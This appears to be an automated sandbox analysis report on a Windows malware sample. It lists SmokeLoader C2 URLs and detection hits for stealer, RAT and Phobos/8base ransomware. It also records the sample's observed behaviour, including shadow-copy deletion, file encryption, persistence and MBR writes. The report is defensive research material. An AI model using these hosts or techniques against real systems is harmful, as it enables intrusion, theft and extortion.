Analysis
-
max time kernel
300s -
max time network
300s -
platform
windows10-1703_x64 -
resource
win10-20230831-en -
resource tags
arch:x64arch:x86image:win10-20230831-enlocale:en-usos:windows10-1703-x64system -
submitted
07-09-2023 04:47
Static task
static1
Behavioral task
behavioral1
Sample
6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe
Resource
win10-20230831-en
General
-
Target
6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe
-
Size
833KB
-
MD5
17688f03f125bb494dc7f304b8936221
-
SHA1
7fadc66ba11a5b3c4582f4d9b5b245801ccf918a
-
SHA256
6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb
-
SHA512
1636d32e5a59c5c3577d0dc5ecf7dbccc22cc0ce2087889974903257d500e694d2cee4218c17ddba747c4b59ea4f811889837883b40cd009c1463cdc21f65a06
-
SSDEEP
12288:Ib/bL1cEYZpFQOT4KpMT+msoH985+3wAFn6DQnbu7L3SpiQXYIOnUfvDrD8FEsim:WzLmQsI85mn6DQDYpmv8FEyuOGLU
Malware Config
Extracted
smokeloader
2022
http://serverxlogs21.xyz/statweb255/
http://servxblog79.xyz/statweb255/
http://demblog289.xyz/statweb255/
http://admlogs77x.online/statweb255/
http://blogxstat38.xyz/statweb255/
http://blogxstat25.xyz/statweb255/
Extracted
C:\info.hta
class='mark'>[email protected]</span></div>
http://www.w3.org/TR/html4/strict.dtd'>
Extracted
C:\Users\Admin\Desktop\info.hta
Signatures
-
Ammyy Admin
Remote admin tool with various capabilities.
-
AmmyyAdmin payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\2DDC.tmp\svchost.exe family_ammyyadmin C:\Users\Admin\AppData\Local\Temp\2DDC.tmp\svchost.exe family_ammyyadmin -
Detect rhadamanthys stealer shellcode 6 IoCs
Processes:
resource yara_rule behavioral2/memory/2504-14-0x0000000003090000-0x0000000003490000-memory.dmp family_rhadamanthys behavioral2/memory/2504-16-0x0000000003090000-0x0000000003490000-memory.dmp family_rhadamanthys behavioral2/memory/2504-15-0x0000000003090000-0x0000000003490000-memory.dmp family_rhadamanthys behavioral2/memory/2504-17-0x0000000003090000-0x0000000003490000-memory.dmp family_rhadamanthys behavioral2/memory/2504-29-0x0000000003090000-0x0000000003490000-memory.dmp family_rhadamanthys behavioral2/memory/2504-31-0x0000000003090000-0x0000000003490000-memory.dmp family_rhadamanthys -
FlawedAmmyy RAT
Remote-access trojan based on leaked code for the Ammyy remote admin software.
-
Phobos
Phobos ransomware appeared at the beginning of 2019.
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs
Processes:
6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exeE9B2.exedescription pid process target process PID 2504 created 3184 2504 6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe Explorer.EXE PID 4288 created 3184 4288 E9B2.exe smss.exe PID 4288 created 3184 4288 smss.exe PID 4288 created 3184 4288 smss.exe PID 4288 created 3184 4288 smss.exe PID 4288 created 3184 4288 smss.exe PID 4288 created 3184 4288 smss.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
Processes:
bcdedit.exebcdedit.exebcdedit.exebcdedit.exepid process 3512 bcdedit.exe 3560 bcdedit.exe 672 bcdedit.exe 3560 bcdedit.exe -
Renames multiple (459) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Processes:
wbadmin.exewbadmin.exepid process 4632 wbadmin.exe 4940 wbadmin.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 1 TTPs 2 IoCs
-
Stops running service(s) 3 TTPs
-
Deletes itself 1 IoCs
Processes:
certreq.exepid process 1872 certreq.exe -
Drops startup file 3 IoCs
Processes:
_cG.exedescription ioc process File created \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\_cG.exe _cG.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini _cG.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id[F3547DDF-3483].[[email protected]].8base _cG.exe -
Executes dropped EXE 14 IoCs
Processes:
_cG.exey853e.exe_cG.exey853e.exe_cG.exe_cG.exeACF4.exeACF4.exeACF4.exeB283.exeBE8A.exeE9B2.exesmss.exeB283.exepid process 1224 _cG.exe 1232 y853e.exe 4468 _cG.exe 5024 y853e.exe 5052 _cG.exe 3796 _cG.exe 3356 ACF4.exe 4512 ACF4.exe 1740 ACF4.exe 4812 B283.exe 316 BE8A.exe 4288 E9B2.exe 1908 smss.exe 1740 B283.exe -
Loads dropped DLL 2 IoCs
Processes:
BE8A.exesmss.exepid process 316 BE8A.exe 2864 smss.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 9 IoCs
Processes:
certreq.exeexplorer.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook certreq.exe Key opened \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook certreq.exe Key opened \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook certreq.exe Key opened \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook certreq.exe Key opened \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook certreq.exe Key opened \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook certreq.exe Key opened \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
_cG.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Windows\CurrentVersion\Run\_cG = "C:\\Users\\Admin\\AppData\\Local\\_cG.exe" _cG.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\_cG = "C:\\Users\\Admin\\AppData\\Local\\_cG.exe" _cG.exe -
Drops desktop.ini file(s) 64 IoCs
Processes:
_cG.exedescription ioc process File opened for modification C:\Users\Admin\OneDrive\desktop.ini _cG.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini _cG.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini _cG.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini _cG.exe File opened for modification C:\Users\Public\Downloads\desktop.ini _cG.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini _cG.exe File opened for modification C:\Users\Public\Pictures\desktop.ini _cG.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini _cG.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini _cG.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini _cG.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini _cG.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini _cG.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini _cG.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini _cG.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini _cG.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini _cG.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI _cG.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini _cG.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini _cG.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini _cG.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini _cG.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini _cG.exe File opened for modification C:\Users\Admin\Searches\desktop.ini _cG.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini _cG.exe File opened for modification C:\$Recycle.Bin\S-1-5-21-3540700546-2554825161-2349363825-1000\desktop.ini _cG.exe File opened for modification C:\Users\Public\Desktop\desktop.ini _cG.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini _cG.exe File opened for modification C:\Users\Admin\Links\desktop.ini _cG.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini _cG.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini _cG.exe File opened for modification C:\Program Files\desktop.ini _cG.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini _cG.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini _cG.exe File opened for modification C:\Users\Admin\Documents\desktop.ini _cG.exe File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\Stationery\Desktop.ini _cG.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini _cG.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini _cG.exe File opened for modification C:\Users\Public\desktop.ini _cG.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini _cG.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini _cG.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini _cG.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini _cG.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini _cG.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini _cG.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini _cG.exe File opened for modification C:\Users\Admin\Music\desktop.ini _cG.exe File opened for modification C:\Users\Public\Libraries\desktop.ini _cG.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-3540700546-2554825161-2349363825-1000\desktop.ini _cG.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu Places\desktop.ini _cG.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini _cG.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini _cG.exe File opened for modification C:\Users\Admin\Videos\desktop.ini _cG.exe File opened for modification C:\Users\Public\Music\desktop.ini _cG.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini _cG.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini _cG.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini _cG.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini _cG.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini _cG.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini _cG.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini _cG.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini _cG.exe File opened for modification C:\Program Files (x86)\desktop.ini _cG.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini _cG.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini _cG.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
smss.exedescription ioc process File opened for modification \??\PhysicalDrive0 smss.exe -
Drops file in System32 directory 1 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx svchost.exe -
Suspicious use of SetThreadContext 7 IoCs
Processes:
6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe_cG.exey853e.exe_cG.exeACF4.exedescription pid process target process PID 4104 set thread context of 2504 4104 6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe 6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe PID 1224 set thread context of 4468 1224 _cG.exe _cG.exe PID 1232 set thread context of 5024 1232 y853e.exe y853e.exe PID 5052 set thread context of 3796 5052 _cG.exe _cG.exe PID 3356 set thread context of 1740 3356 ACF4.exe ACF4.exe PID 4288 set thread context of 1044 4288 smss.exe PID 4812 set thread context of 1740 4812 B283.exe -
Drops file in Program Files directory 64 IoCs
Processes:
_cG.exedescription ioc process File opened for modification C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\vlc.mo _cG.exe File created C:\Program Files\7-Zip\Lang\co.txt.id[F3547DDF-3483].[[email protected]].8base _cG.exe File created C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019XC2RVL_MAKC2R-pl.xrm-ms.id[F3547DDF-3483].[[email protected]].8base _cG.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_SubTrial-ppd.xrm-ms _cG.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\Assets\Sounds\Nudge.wma _cG.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\images\themeless\web_documentcloud_logo.png.id[F3547DDF-3483].[[email protected]].8base _cG.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] _cG.exe File created C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp5-ul-phn.xrm-ms.id[F3547DDF-3483].[[email protected]].8base _cG.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-256_altform-unplated.png _cG.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsAppList.scale-200.png _cG.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui _cG.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-actions_zh_CN.jar _cG.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxA-Exchange.scale-150.png _cG.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\mashupcompression.dll _cG.exe File created C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.contrast-white_scale-80.png.id[F3547DDF-3483].[[email protected]].8base _cG.exe File created C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\FrameworkList.xml.id[F3547DDF-3483].[[email protected]].8base _cG.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\control\libntservice_plugin.dll _cG.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\AppPackageBadgeLogo.scale-125_contrast-black.png _cG.exe File opened for modification C:\Program Files\Common Files\System\wab32res.dll _cG.exe File created C:\Program Files\Microsoft Office\root\Client\api-ms-win-core-file-l1-2-0.dll.id[F3547DDF-3483].[[email protected]].8base _cG.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\sfodbc.did _cG.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\animations\OneNoteFRE_CreateNotes_LTR_Phone.mp4 _cG.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\de-de\ui-strings.js.id[F3547DDF-3483].[[email protected]].8base _cG.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\zh-cn_get.svg _cG.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.httpcomponents.httpclient_4.2.6.v201311072007.jar _cG.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\psfont.properties.ja _cG.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\LTR\contrast-white\SmallTile.scale-125.png _cG.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-crt-private-l1-1-0.dll _cG.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\9434_24x24x32.png _cG.exe File created C:\Program Files\VideoLAN\VLC\plugins\demux\libmp4_plugin.dll.id[F3547DDF-3483].[[email protected]].8base _cG.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fi-fi\ui-strings.js.id[F3547DDF-3483].[[email protected]].8base _cG.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\hr-hr\ui-strings.js.id[F3547DDF-3483].[[email protected]].8base _cG.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\LTR\contrast-white\LargeTile.scale-200.png _cG.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Res.dll.id[F3547DDF-3483].[[email protected]].8base _cG.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Assets\PeopleAppList.targetsize-40.png _cG.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\es-es\ui-strings.js.id[F3547DDF-3483].[[email protected]].8base _cG.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\ja-jp\ui-strings.js _cG.exe File created C:\Program Files\Java\jre1.8.0_66\bin\jp2iexp.dll.id[F3547DDF-3483].[[email protected]].8base _cG.exe File created C:\Program Files\Microsoft Office\root\Licenses16\ProjectProXC2RVL_KMS_ClientC2R-ul-oob.xrm-ms.id[F3547DDF-3483].[[email protected]].8base _cG.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\6100_20x20x32.png _cG.exe File opened for modification C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1 _cG.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\hu_get.svg _cG.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.xml.id[F3547DDF-3483].[[email protected]].8base _cG.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusMSDNR_Retail-pl.xrm-ms _cG.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\file_info.png.id[F3547DDF-3483].[[email protected]].8base _cG.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEEXCL.DLL _cG.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\nc_60x42.png _cG.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-30_contrast-white.png _cG.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\it-IT\TipTsf.dll.mui _cG.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\EmbossBitmaps\No Symbol_icon.png _cG.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Office Setup Controller\Office.en-us\BRANDING.XML.id[F3547DDF-3483].[[email protected]].8base _cG.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\WorldClockMedTile.scale-200.png _cG.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\69_24x24x32.png _cG.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-keyring-fallback.jar _cG.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host-remote.xml.id[F3547DDF-3483].[[email protected]].8base _cG.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\PlatformCapabilities\PowerPointCapabilities.json _cG.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\StoreSmallTile.scale-100.png _cG.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Assets\SkypeLargeTile.scale-200_contrast-black.png _cG.exe File opened for modification C:\Program Files (x86)\Common Files\System\es-ES\wab32res.dll.mui _cG.exe File created C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription3-ul-oob.xrm-ms.id[F3547DDF-3483].[[email protected]].8base _cG.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Fues\green_button.png _cG.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\dd_arrow_small2x.png _cG.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\IMCONTACT.DLL _cG.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pl-pl\ui-strings.js _cG.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 2504 sc.exe 3356 sc.exe 1492 sc.exe 4656 sc.exe 4840 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 4332 592 WerFault.exe 4264 992 WerFault.exe -
NSIS installer 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\BE8A.exe nsis_installer_1 C:\Users\Admin\AppData\Local\Temp\BE8A.exe nsis_installer_2 C:\Users\Admin\AppData\Local\Temp\BE8A.exe nsis_installer_1 C:\Users\Admin\AppData\Local\Temp\BE8A.exe nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 7 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
y853e.exevds.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI y853e.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI y853e.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI y853e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
certreq.exedescription ioc process Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 certreq.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString certreq.exe -
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exepid process 4680 vssadmin.exe 3192 vssadmin.exe -
Modifies registry class 3 IoCs
Processes:
smss.exe_cG.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance smss.exe Key created \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance smss.exe Key created \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000_Classes\Local Settings _cG.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.execertreq.exe_cG.exey853e.exey853e.exe_cG.exeExplorer.EXE_cG.exepid process 4104 6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe 2504 6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe 2504 6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe 2504 6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe 2504 6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe 1872 certreq.exe 1872 certreq.exe 1872 certreq.exe 1872 certreq.exe 1224 _cG.exe 1232 y853e.exe 5024 y853e.exe 5024 y853e.exe 5052 _cG.exe 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 